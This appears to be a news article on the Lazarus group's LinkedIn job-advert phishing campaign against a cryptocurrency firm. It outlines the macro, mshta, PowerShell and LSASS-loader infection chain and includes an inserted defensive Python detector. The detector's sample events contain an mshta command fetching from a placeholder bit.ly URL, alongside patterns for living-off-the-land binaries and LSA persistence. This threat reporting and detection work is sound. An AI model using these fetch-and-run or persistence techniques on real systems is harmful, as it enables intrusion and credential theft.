Lazarus group strikes cryptocurrency firm through LinkedIn job adverts

Updated: A system administrator proved to be the weak link, opening the door for Lazarus to attack.
Written by Charlie Osborne, Contributing Writer

The Lazarus group is on the hunt for cryptocurrency once more and has now launched a targeted attack against a crypto organization by exploiting the human element of the corporate chain.

On Tuesday, cybersecurity researchers from F-Secure said the cryptocurrency organization is one of the latest victims in a global campaign that has targeted businesses in at least 14 countries, including the UK and US.

Lazarus is an advanced persistent threat (APT) group thought to be tied to North Korea. Economic sanctions imposed on the country over its nuclear programs, human rights abuses, and more may help explain the group's focus on financially motivated attacks, which have expanded to include cryptocurrency in the past three years.

The US government says Lazarus was formed in 2007, and since then researchers have attributed the global WannaCry attack wave, the $80 million Bangladeshi bank heist, and the 2018 HaoBao Bitcoin-stealing campaign to the group.

According to F-Secure, the latest Lazarus attack was tracked through a LinkedIn job advert. The human target, a system administrator, received a phishing document in their personal LinkedIn account that related to a blockchain technology company seeking a new sysadmin with the employee's skill set.

The phishing email is similar to Lazarus samples already made available on VirusTotal, including the same names, authors, and word counts.

As is the case with many phishing documents, the attacker must entice the victim into enabling the macros that hide the malicious code for the document to be effective. In this case, the Microsoft Word document claimed to be protected under the EU's General Data Protection Regulation (GDPR), and so the document's content could only be shown if macros were enabled.

Once permission is granted, the document's macro creates a .LNK file that launches mshta.exe and calls out to a bit.ly link pointing to a VBScript.

This script conducts system checks and sends operational information to a command-and-control (C2) server. The C2 provides a PowerShell script able to fetch Lazarus malware payloads. 

The infection chain changes depending on system configuration, and the threat actors use a range of tools. These include two backdoor implants similar to those already documented by Kaspersky (PDF) and ESET.

Lazarus also uses a custom portable executable (PE) loader that is loaded into the lsass.exe process as a 'security' package and modifies registry keys using the schtasks Windows utility.

Other malware variants used by Lazarus can execute arbitrary commands, decompress data in memory, and download and execute additional files. These samples, including a file called LSSVC.dll, were also used to connect backdoor implants to other target hosts.
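The chain described above (an Office macro dropping a .LNK, mshta.exe reaching out to a URL shortener, and a loader registered as an LSA security package) leaves telemetry a defender can check for. The following is an added example, not code from F-Secure or ZDNet: it runs simple detection logic over constructed Sysmon-style events. The event field names, the sample paths and the shortener URL are assumptions; the Lsa\Security Packages registry value is a real Windows location.

```python
import re

# Constructed sample telemetry (Sysmon-style process, file and registry
# events); these are not real events from the F-Secure investigation.
WINWORD = r"C:\Program Files\Microsoft Office\WINWORD.EXE"
SAMPLE_EVENTS = [
    {"type": "file", "image": WINWORD,
     "target": r"C:\Users\admin\AppData\Roaming\example.lnk"},
    {"type": "process", "parent": WINWORD,
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe https://bit.ly/EXAMPLE-placeholder"},
    {"type": "process", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
    {"type": "registry", "image": r"C:\Windows\System32\reg.exe",
     "key": r"HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages",
     "value": "kerberos msv1_0 schannel wdigest tspkg pku2u suspicious_pkg"},
    {"type": "registry", "image": "setup.exe",
     "key": r"HKLM\Software\Example\Setting", "value": "1"},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
LOLBINS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe"}
SHORTENERS = ("bit.ly/", "tinyurl.com/")
LSA_KEY = r"HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages"
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the list of finding tags for one event (empty if benign)."""
    findings = []
    if event["type"] == "file":
        # Office application writing a shortcut file (macro dropping a .LNK).
        if basename(event["image"]) in OFFICE_APPS and event["target"].lower().endswith(".lnk"):
            findings.append("office-wrote-lnk")
    elif event["type"] == "process":
        parent, child = basename(event["parent"]), basename(event["image"])
        if parent in OFFICE_APPS and child in LOLBINS:
            findings.append(f"office-spawned-{child}")
            url = URL_RE.search(event["cmdline"])
            if url and any(s in url.group(0).lower() for s in SHORTENERS):
                findings.append("url-shortener-in-cmdline")
    elif event["type"] == "registry" and event["key"].lower() == LSA_KEY.lower():
        # A new LSA security package is loaded into lsass.exe at boot.
        findings.append("lsa-security-package-modified")
    return findings


def scan(events):
    """Pair each event index with every finding raised on it."""
    return [(i, f) for i, e in enumerate(events) for f in classify(e)]
```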

A tailored version of Mimikatz is used to harvest credentials from an infected machine, especially those with financial value -- such as cryptocurrency wallets or online bank accounts. 

F-Secure says that Lazarus has attempted to avoid detection by wiping evidence, including deleting security events and logs. However, it was still possible to snag a few samples of the APT's current toolkit to investigate the group's current activities. 

"It is F-Secure's assessment that the group will continue to target organizations within the cryptocurrency vertical while it remains such a profitable pursuit, but may also expand to target supply chain elements of the vertical to increase returns and longevity of the campaign," the researchers say.  

Update 19.16 pm BST: Paul Rockwell, Head of Trust and Safety at LinkedIn, told ZDNet:

"We actively seek out signs of state-sponsored activity on the platform and quickly take action against bad actors in order to protect our members. We don't wait on requests; our threat intelligence team removes fake accounts using information we uncover and intelligence from a variety of sources, including government agencies. Our teams utilize a variety of automated technologies, combined with a trained team of reviewers and member reporting, to keep our members safe from all types of bad actors. We enforce our policies, which are very clear: the creation of a fake account or fraudulent activity with an intent to mislead or lie to our members is a violation of our terms of service."
